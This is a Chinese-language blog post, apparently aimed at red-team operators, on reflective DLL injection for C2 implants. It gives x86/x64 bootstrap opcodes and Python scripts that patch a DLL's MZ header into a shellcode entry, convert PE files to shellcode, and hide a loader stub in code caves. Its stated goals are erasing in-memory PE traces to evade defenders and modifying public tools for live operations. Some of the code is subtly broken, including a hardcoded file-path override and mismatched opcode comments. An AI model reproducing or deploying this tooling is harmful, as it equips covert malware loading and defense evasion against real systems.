简介
反射注入(ReflectiveInjection)这种技术也出来好多年了,实现原理大致是不依赖windows提供的loadlibrary函数,程序设计者自己在程序内实现pe的内存展开,由于是自己实现,所以不会在操作系统中有所记录,以及可以对展开的pe文件做一些处理如抹除DOS头,同时不会在peb的ldr链表中记录,发展至今反射注入几乎已经是所有c2的标配技术,github也有非常成熟的项目可供使用,不过由于使用量较大,建议还是简单修改一下再投入实战比较好。
下面写的东西和上面的描述有关系(dog头),可能有的渗透测试工作者不熟悉反射加载的原理,但你一定用过它,较为知名的msf和cs也大量使用这种技术,说是c2的基础技术也不为过,这篇文章会介绍两个应用方式,以及一些优化的思路,以供我们更好的吊打蓝队。
DLL自加载
在cs的资源文件中所有dll都带有自加载能力,所有beacon的扩展功能几乎都是这样实现的(如mimikatz),cs将其称之为可修补的dll,它的原理是在不改变MZ标志的情况下把整个dll文件修补成可被当作shellcode加载的格式,具体的操作为在dll内导出自加载函数(ReflectiveLoader)然后讲MZ头起始字节修改成执行ReflectiveLoader函数的硬编码。
流程
将ReflectiveLoader库编译进DLL内。
不破坏MZ标志将DOS头改造成执行ReflectiveLoader函数的shellcode。
原理
现今仍在使用的DOS结构成员只有标识PE文件的MZ标志和指向PE头的e_lfanew,其他我们随意修改不会影响这个PE文件的正常运行。
我们不能破坏PE结构也就是DOS头内的MZ标志,如果我们要把dll处理成shellcode,那么MZ标志就要被当作是代码执行。
我们将MZ的机器码转换成汇编指令,这里以X86为例,文章末尾也会给出X64的代码。
可以看到MZ对应的汇编代码是↓,我们需要消除这两条指令的影响。
dec ebp ;ebp -1
pop edx ;edx=[esp] esp+4
//恢复环境
inc ebp ;ebp +1
push edx ;esp-4 [esp]=edx
然后需要将执行指针(eip/rip)指向ReflectiveLoader。
call 0 ;获取下一条指令的内存地址
pop edx ;将下一条指令出栈给edx
add edx,<FuncOffset-0x09>;计算ReflectiveLoader函数在内存中的位置
push ebp
mov ebp, esp ;切换堆栈
call edx ;调用ReflectiveLoader
修补过后↓,这里代码使用https://github.com/rapid7/ReflectiveDLLInjection。
x64:
41 5a ;pop r10
41 52 ;push r10
e8 00 00 00 00 ;call 0
5b ;pop rbx
48 81 c3 09 00 00 00 ;add rbx, 0x09
55 ;push rbp
48 89 e5 ;mov rbp, rsp
ff d3 ;call rbx
代码
import sys
import pefile
from struct import pack
def help():
print("usage: python3 <DllPath> <FuncName>\n")
def get_func_offset(pe_file,func_name):
if hasattr(pe_file,'DIRECTORY_ENTRY_EXPORT'):
for export in pe_file.DIRECTORY_ENTRY_EXPORT.symbols:
if func_name in str(export.name):
func_rva = export.address
break
if func_rva == 0:
help()
print("[-] not found function offset in file")
sys.exit(0)
offset_va = func_rva - pe_file.get_section_by_rva(func_rva).VirtualAddress
func_file_offset = offset_va + pe_file.get_section_by_rva(func_rva).PointerToRawData
func_file_offset -= 9
return bytes(pack("<I",func_file_offset))
def get_patch_stub(pe_file,func_offset):
if pe_file.FILE_HEADER.Machine == 0x014c:
is64 = False
elif pe_file.FILE_HEADER.Machine ==0x0200 or pe_file.FILE_HEADER.Machine ==0x8664:
is64 =True
else:
print("[-]unknow the format of this pe file")
sys.exit()
if is64:
stub =(
b"\x4D\x5A"
b"\x41\x52"
b"\xe8\x00\x00\x00\x00"
b"\x5b"
b"\x48\x81\xC3" + func_offset +
b"\x55"
b"\x48\x89\xE5"
b"\xFF\xD3"
);
else:
stub = (
b"\x4D"
b"\x5A"
b"\x45"
b"\x52"
b"\xE8\x00\x00\x00\x00"
b"\x5A"
b"\x81\xC2" + func_offset +
b"\x55"
b"\x8B\xEC"
b"\xFF\xD2"
);
return stub;
def patch_dll(pe_path,func_name):
try:
pe_file =pefile.PE(pe_path)
except e:
print(str(e))
help()
sys.exit()
func_offset = get_func_offset(pe_file,func_name)
patch_stub = get_patch_stub(pe_file,func_offset)
filearray = open(pe_path,'rb').read()
print("[+] loaded nameof %s"% (pe_path))
patch_dll_file = patch_stub + filearray[len(patch_stub):]
print("[+] patched offset %s" % (func_offset.hex()))
patch_dll_name = "patch-" +pe_path
open(patch_dll_name,'wb').write(patch_dll_file)
print("[+] wrote nameof %s"% (patch_dll_name))
if __name__ == '__main__':
a = len(sys.argv)
if len(sys.argv) != 3:
help()
sys.exit(0);
pe_path = sys.argv[1]
func_name = sys.argv[2]
patch_dll(pe_path,func_name)
优化
我们看到反射加载的DLL在内存中还是会存在很明显的PE格式文件特征,接下来我们尝试把他的PE特征抹掉。(涉及项目,修改后的反射代码就不贴了)。
优化前。
优化后。
聪明的你应该已经想到我做了什么(狗头)。
PE->SHELLCODE改造
追加->思路
上面的操作大概是这样的↓,学过shellcode开发的朋友可能知道,如果我们直接在DLL文件内编写加载函数是不能使用一些编写语法的如字符串、函数、CRT之类的东西的,就算要用系统函数也不能直接调用,前面我们使用的ReflectiveDLLInjection项目中ReflectiveLoader函数源码其实是经过特殊处理的,它遵循shellcode的开发限制,把所有东西都编译到一起,也避免了所有字符串和依赖的限制,保证了的编译出来的代码在任意环境下都能使用,也就是这段代码抠出来是能直接使用的,如果我们编写一个可修补的dll比较麻烦,我们也可以利用这段反射加载的shellcode来对已有PE文件进行改造。
改造思路:
这种技术已经有比较成熟的开源项目pe_to_shellcode,这个老哥用汇编实现了一个反射加载的stub(太硬核了),同样我们也用上一种应用的思路对这个stub进行优化,加载后抹除PE的特征,在这个基础上,我们可以快速对一个已有的功能模块进行修补。
pe_to_shellcode项目中给出的汇编编写的ReflectiveLoader函数不需要像rapid7给出的反射库一样切换堆栈,但是需要压栈传入pe文件所在位置。
由于不需要切换堆栈(切换堆栈的机器码不同位数有差异),就可以统一不同位数程序的bootstrap。
代码
b"\x4d"+
b"\x5A" +#pop edx
b"\x45" +#inc ebp
b"\x52" +#push edx
b"\xE8\x00\x00\x00\x00" +#call <next_line>
b"\x5B" +# pop ebx
b"\x48\x83\xEB\x09" +# sub ebx,9
b"\x53" +# push ebx (Image Base)
b"\x48\x81\xC3" +# add ebx,
pack("<I",func_offset) +# value
b"\xFF\xD3" +# call esp
b"\xc3" # ret
def addit_pe(pe_path):
pe_file = get_pe_load(pe_path)
pe_file_array = open(pe_path, 'rb').read()
print("[+] loaded nameof %s" % (pe_path))
addit_bootstrap = get_inject_bootstrap(pe_file,len(pe_file_array))
if get_pe_bit(pe_file):
addit_stub = open('resources/stub64.bin', 'rb').read()
else:
addit_stub = open('resources/stub32.bin', 'rb').read()
patch_pe_file = addit_bootstrap + pe_file_array[len(addit_bootstrap):] + addit_stub
print("[+] patched offset %d" % (len(pe_file_array)))
patch_pe_name = "patch-" + pe_path
open(patch_pe_name, 'wb').write(patch_pe_file)
print("[+] wrote nameof %s" % (patch_pe_name))
优化->注入->思路
上面的实现方式会对PE文件本身的大小产生影响,在哪年的黑帽大会上有一位究极老师傅公开过一种PE注入技术(还有武器化的工具),原理是利用编译过程中产生的code caves(编译过程文件对齐产生的空字节区),在这些区域插入loader stub,就可以避免改造后的PE文件体积增大,不过需要注入代码洞的大小不能小于loader stub的大小。
看上去是这样的:
代码
import sys
import pefile
from struct import pack
def help():
print("usage: python3 <PePath>")
def get_pe_bit(pe_file):
if pe_file.FILE_HEADER.Machine == 0x014c:
is64 = False
elif pe_file.FILE_HEADER.Machine ==0x0200 or pe_file.FILE_HEADER.Machine == 0x8664:
is64 =True
else:
print("[-]unknow the format of this pe file")
sys.exit()
return is64
def get_patch_stub(pe_file,func_offset):
stub = (
b"\x4d"+
b"\x5A" +#pop edx
b"\x45" +#inc ebp
b"\x52" +#push edx
b"\xE8\x00\x00\x00\x00" +#call <next_line>
b"\x5B" +# pop ebx
b"\x48\x83\xEB\x09" +# sub ebx,9
b"\x53" +# push ebx (Image Base)
b"\x48\x81\xC3" +# add ebx,
pack("<I",func_offset) +# value
b"\xFF\xD3" +# call esp
b"\xc3" # ret
);
return stub;
def patch_pe(pe_path):
try:
pe_file =pefile.PE(pe_path)
except e:
print(str(e))
help()
sys.exit()
patch_size = 0
patch_location = 0
if get_pe_bit(pe_file):
reflective_stub = open('stub64.bin','rb').read()
else:
reflective_stub = open('stub32.bin','rb').read()
cave_size=len(reflective_stub);
for section in pe_file.sections:
section_cave_size = section.SizeOfRawData - section.Misc_VirtualSize
section_cave_location =section.Misc_VirtualSize + section.PointerToRawData
print("[+] looking for a codecave in %s sizeof %d offset of %x" % (section.Name,section_cave_size,section_cave_location))
if section_cave_size > cave_size:
patch_size=section_cave_size
patch_location = section_cave_location
break
if patch_size ==0:
print("[-] not enough size code cvae found ")
help()
sys.exit()
patch_stub = get_patch_stub(pe_file,patch_location)
pe_file_array = open(pe_path,'rb').read()
print("[+] loaded nameof %s"% (pe_path))
patch_pe_file = patch_stub + pe_file_array[len(patch_stub):patch_location] + reflective_stub +pe_file_array[patch_location+len(reflective_stub):]
print("[+] patched offset %x" % (section_cave_location))
patch_pe_name = "patch-" +pe_path
open(patch_pe_name,'wb').write(patch_pe_file)
print("[+] wrote nameof %s"% (patch_pe_name))
if __name__ == '__main__':
a = len(sys.argv)
if len(sys.argv) != 2:
help()
sys.exit(0);
pe_path = sys.argv[1]
pe_path= "runshc32.exe"
patch_pe(pe_path)
LINKS